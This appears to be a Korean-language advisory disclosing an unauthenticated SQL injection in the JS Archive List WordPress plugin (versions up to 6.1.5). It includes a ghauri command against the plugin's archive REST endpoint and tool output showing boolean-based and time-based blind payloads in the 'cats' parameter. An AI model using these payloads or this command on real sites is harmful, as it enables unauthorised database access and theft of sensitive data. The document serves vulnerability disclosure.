
JS Archive List <= 6.1.5 - 인증되지 않은 SQL 인젝션
JS Archive List <= 6.1.5 - 인증되지 않은 SQL 인젝션
JS Archive List WordPress 플러그인은 6.1.5 버전을 포함한 모든 버전에서 사용자 제공 파라미터에 대한 이스케이프 처리 부족 및 기존 SQL 쿼리에 대한 충분한 준비 부재로 인해 SQL 인젝션에 취약합니다. 이를 통해 인증되지 않은 공격자가 기존 쿼리에 추가 SQL 쿼리를 삽입하여 데이터베이스에서 민감한 정보를 추출할 수 있습니다.
ghauri -u "http://localhost/wp-json/jalw/v1/archive?cats=1&exclusionType=exclude"
________.__ .__ {1.4.1}
/ _____/| |__ _____ __ _________|__|
/ \ ___| | \\__ \ | | \_ __ \ |
\ \_\ \ Y \/ __ \| | /| | \/ |
\______ /___| (____ /____/ |__| |__|
\/ \/ \/ https://github.com/r0oth3x49
An advanced SQL injection detection & exploitation tool.
[*] starting @ 16:39:05 /2025-09-25/
[16:39:05] [INFO] testing connection to the target URL
Ghauri resumed the following injection point(s) from stored session:
---
Parameter: cats (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cats=1 AND 01609=1609&exclusionType=exclude
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: cats=if(now()=sysdate(),SLEEP(5),0)&exclusionType=exclude
---
[16:39:05] [INFO] testing MySQL
[16:39:05] [INFO] confirming MySQL
[16:39:06] [INFO] the back-end DBMS is MySQL